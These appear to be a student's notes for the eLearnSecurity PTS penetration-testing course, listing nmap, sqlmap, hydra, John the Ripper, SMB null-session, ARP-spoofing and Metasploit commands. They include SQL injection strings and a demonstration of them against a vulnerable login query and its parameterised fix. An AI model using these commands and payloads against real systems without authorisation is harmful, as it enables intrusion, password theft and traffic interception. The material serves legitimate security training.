Tools and Commands learned from PTS → eLearnSecurity:-
NOTE:- This write-up is just my notes for the PTS course. It does not dispense with what is offered by eLearnSecurity.
Tools:-
1. Wireshark:- a protocol analyzer / network sniffer that lets you see the data transmitted over the network (you will see whether the data is sent in clear text or encrypted).
2. Burp Suite:- used to send HTTP/HTTPS requests and analyze the requests and responses.
3. Subdomain enumeration tools:
   - google.com:- site:company.com
   - virustotal.com
4. Nessus:- a vulnerability assessment scanner.
   Once we download the Nessus package from https://www.tenable.com/, open the terminal and type:- sudo dpkg -i <path of the downloaded file>
   To start Nessus type:- sudo service nessusd start, then open:- https://www.tenable.com/
5. Dirbuster:- a tool to find hidden files and directories on websites.
6. ophcrack:- a rainbow-table attack tool.
Commands (Linux OS):-
1. To view the routing table:- ip route
2. To add a route manually:- sudo ip route add <network-ip> via <gateway-ip>
3. To view the ARP cache:- ip neighbour
4. To view network statistics and protocol status:- netstat
5. To do reverse DNS resolution (from DNS name to IP):- ping
6. To write or read something from a web site, send HTTP requests and analyze the requests and responses:- netcat / nc
7. To write or read something from a web site, send HTTPS requests and analyze the requests and responses:- openssl s_client -connect <host>:<port>
8. Subdomain enumeration (collect DNS data from various sources):- sublist3r, amass
9. To check if a machine is alive or not we use:- ping
10. To perform a ping sweep:- fping -a -g <the range>
    - -a → show only alive hosts
    - -g → generate the targets from an IP range (ping sweep)
11. To send error messages to /dev/null so they are not shown in the output:- 2>/dev/null
12. To perform a ping scan using nmap:- nmap -sn <ip-address/range>
13. To read the IP range for nmap from a file:- nmap -iL <file path>
14. To do offline fingerprinting use:- p0f
15. To do active operating system fingerprinting use:- nmap -O
16. To limit the operating system scan:- nmap -O --osscan-limit
17. To do a scan using nmap without a port scan:- nmap -Pn
18. To do a TCP scan using nmap:- nmap -sT
19. To do a SYN scan using nmap:- nmap -sS
20. To do a version detection scan using nmap:- nmap -sV
21. To do a port scan and specify the port numbers using nmap:- nmap -p <ports>
22. To see the reason nmap reports a given port or host state:- nmap --reason
23. To scan a large company network use:- masscan
24. To do signature-based fingerprinting of web servers using httprint:-
    httprint -P0 -h <target> -s <signature file>
    - -P0 → avoid pinging the host
    - -h → the target host(s)
    - -s → the signature file
HTTP Verbs:-
25. To view the size in bytes of a file:- wc -c <file>
26. To use the command-line tool of Dirbuster:- dirb <target>
27. To automate a SQL injection attack on a GET request using sqlmap:-
    sqlmap -u [url] -p [parameter] [options]
28. To automate a SQL injection attack on a POST request using sqlmap:-
    sqlmap -u [url] --data=[POST string] -p [parameter] [options]
    - -h → view the sqlmap manual.
    - -u → the target URL.
    - -p → the parameter(s) to test; if there is only one parameter it can be omitted.
    - --dbms= → specify the back-end database.
    - --technique= → specify the SQL injection technique.
    - -b / --banner → retrieve the banner information.
    - --tables → enumerate tables.
    - --columns → enumerate columns.
    - --dump → dump the table entries.
    - --wizard → guided (beginner) mode for enumerating the database.
29. John the Ripper is an extremely popular password cracking tool.
    - --list=formats → view the formats John supports → john --list=formats
    - To crack passwords, first merge passwd and shadow → unshadow passwd shadow > <file to crack>
    - To perform pure brute forcing → john --incremental --users:<users list> <file to crack>
    - To display the passwords John has discovered → john --show <cracked file>
    - To perform a dictionary attack → john --wordlist[=<wordlist file>] <file to crack>
    - To do word mangling → --rules
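As an added example (not from the PTS course and not John's own code), the merge that `unshadow passwd shadow` performs in note 29, reimplemented over constructed passwd/shadow lines, followed by a defender's audit that flags the entries John cracks fastest: empty password fields, legacy DES and md5crypt hashes. All usernames and hash bodies are made-up placeholders.

```python
# unshadow merge + weak-hash audit; added example on constructed data, not course code.
import re

# Constructed sample lines (not from a real system); hash bodies are placeholders.
PASSWD = """root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc:x:1001:1001:service:/var/svc:/usr/sbin/nologin
bob:x:1002:1002:Bob:/home/bob:/bin/bash"""
SHADOW = """root:$6$saltsalt$PLACEHOLDERsha512cryptHash:18519:0:99999:7:::
alice:$1$abcdefgh$PLACEHOLDERmd5cryptHash:18519:0:99999:7:::
svc::18519:0:99999:7:::
bob:!:18519:0:99999:7:::"""

# crypt(3) scheme ids; the weak ones are also the ones John brute-forces fastest.
HASH_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
            "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}
WEAK = {"EMPTY: login without password", "legacy DES crypt", "md5crypt"}

def unshadow(passwd: str, shadow: str) -> list[str]:
    """Replace the 'x' password field of each passwd line with the shadow hash."""
    hashes = {l.split(":")[0]: l.split(":")[1] for l in shadow.splitlines() if l}
    merged = []
    for line in passwd.splitlines():
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])  # keep 'x' if no shadow entry
        merged.append(":".join(fields))
    return merged

def classify(hash_field: str) -> str:
    """Name the hash scheme, or the reason the account needs attention."""
    if hash_field == "":
        return "EMPTY: login without password"
    if hash_field.startswith(("!", "*")):
        return "locked"
    m = re.match(r"^\$([^$]+)\$", hash_field)
    if not m:  # traditional DES crypt has no $id$ prefix and is 13 chars long
        return "legacy DES crypt" if len(hash_field) == 13 else "unknown"
    return HASH_IDS.get(m.group(1), f"unknown id ${m.group(1)}$")

def audit(merged: list[str]) -> dict[str, str]:
    """Return {user: finding} for every account whose hash is weak or missing."""
    findings = {}
    for line in merged:
        user, hash_field = line.split(":")[:2]
        kind = classify(hash_field)
        if kind in WEAK:
            findings[user] = kind
    return findings

print(audit(unshadow(PASSWD, SHADOW)))
```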
30. Tool used to attack network authentication (logins):- hydra
    - without any switches / -h → view the hydra manual.
    - -U → view details about a module.
    - -L → load a list of usernames from a file.
    - -P → load a list of passwords from a file.
    - <module>://<target> → specify the module (service) and the target.
31. Tool to display information about the target (file share) using the Samba suite:- nmblookup -A <ip address>
32. Tool to access a file share using the Samba suite:- smbclient -L \\\\<ip address>\\<share name> -N
    - -L → display all services available on the target.
    - -N → force the tool not to ask for a password.
33. To automate null session exploitation:- enum4linux 10.130.40.80 -n
    or
    cd /usr/share/doc/python3-impacket/examples/
    python3 samrdump.py 192.168.99.162
    or
    nmap --script=smb-enum-shares 192.168.99.162 → check for a null session
    nmap --script=smb-enum-users 192.168.99.162 → enumerate users
    nmap --script=smb-brute 192.168.99.162 → perform a brute force attack
ARP spoofing attack:-
34. To enable Linux kernel IP forwarding:- echo 1 > /proc/sys/net/ipv4/ip_forward
    or
    sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
35. To intercept traffic on a switched LAN using the Dsniff tools (MITM attack):- arpspoof -i <interface> -t <target> -r <host>
36. To start msfconsole:- msfconsole
    - show -h → view the manual for the show command.
    - search <term> → search for a given term or module.
    - show exploits → display exploits.
    - use <path of the exploit> → select an exploit.
    - back → leave the selected module (cancel the exploitation).
    - info → display related information.
    - show options → check the exploit options.
    - set <option> <value> → configure an option.
    - show payloads → show the available payloads.
    - set payload <path> → choose a payload.
    - exploit → launch the exploit.
37. Common Meterpreter configurations:-
    - bind_tcp runs a server process on the target machine that waits for connections from the attacker machine → set payload java/meterpreter/bind_tcp
    - reverse_tcp performs a TCP connection back to the attacker machine → set payload linux/x86/meterpreter/reverse_tcp
    - bypassuac bypasses the UAC restriction → use exploit/windows/local/bypassuac
    - background → switch from a Meterpreter session back to the console.
    - sessions -l → list opened sessions.
    - sessions -i <session number> → switch to an opened session.
    - sysinfo → retrieve information about the exploited machine.
    - ifconfig → print the network configuration.
    - route → print the routing information.
    - getuid → show which user is running the process.
    - getsystem → privilege escalation.
    - shell → run a standard command shell.
    - help → display all Meterpreter commands.
38. To update the Metasploit framework:- sudo apt update ; sudo apt install metasploit-framework
39. To perform faster searches we use the PostgreSQL service; to start it:- sudo service postgresql start
40. To start Metasploit:- sudo msfdb init
41. To check if the machine is vulnerable to known vulnerabilities, inside msfconsole:- nmap --script smb-check-vulns.nse --script-args=unsafe=1 <ip target>
42. To show known vulnerabilities using nmap:- sudo nmap -p 445 --script vuln 10.10.10.4
43. To connect to a machine using telnet:- telnet <ip address> -l <username>
Attacks:-
1. XSS attack:-
2. SQL injection:-
   a. or 1=1;-- -
   b. ' UNION SELECT null, null;-- -
   Sometimes we need to put ' before the injection statement and sometimes not, so we had better try both.
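Added example (not from the course notes): the two injection strings above, with the leading quote the note says to try, run against a login query built by string concatenation and against its parameterised fix. The in-memory SQLite users table and its two accounts are constructed.

```python
# The two injection strings from the notes against a string-built login query and
# its parameterised fix. Added example; the users table is constructed, not real.
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory database with a constructed users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('alice', 'hunter2')")
    return con

def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: user input becomes part of the SQL grammar."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return con.execute(query).fetchone() is not None

def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: values travel separately from the statement, so quotes
    and comment sequences are just characters inside a string."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return con.execute(query, (username, password)).fetchone() is not None

def attempt(login, con: sqlite3.Connection, username: str, password: str) -> str:
    """Report what the application observes; a DB error shown to the user leaks
    schema details (here the column count), so catch it and log it server-side."""
    try:
        return "granted" if login(con, username, password) else "denied"
    except sqlite3.Error as exc:
        return f"db error: {exc}"

# Payloads (a) and (b) from the notes, each with the leading quote.
PAYLOAD_OR = "' or 1=1;-- -"
PAYLOAD_UNION = "' UNION SELECT null, null;-- -"

if __name__ == "__main__":
    con = make_db()
    for name, login in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        print(name, "OR:", attempt(login, con, PAYLOAD_OR, "anything"))
        print(name, "UNION:", attempt(login, con, PAYLOAD_UNION, "anything"))
```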
Commands (Windows OS):-
1. Tool to display information about the target (file share):- nbtstat
   - /? → view the help manual.
   - -A → display information about the target.
   - <00> → means workstation.
   - <02> → means there is file sharing.
2. Tool to enumerate the shares:- NET VIEW <ip target>
3. To connect to a file share with no username and password to check for a null session:- NET USE \\<ip target address>\IPC$ "" /u:""
4. To exploit a null session and enumerate file shares:- enum -S 10.130.40.80
   - -S → enumerate file shares
   - -U → enumerate users
   - -P → check the password policy
5. To automate null session exploitation:- winfo 10.130.40.80 -n
6. To escalate privileges:- getsystem
Created on 14 September 2020
Edited on 6 October 2020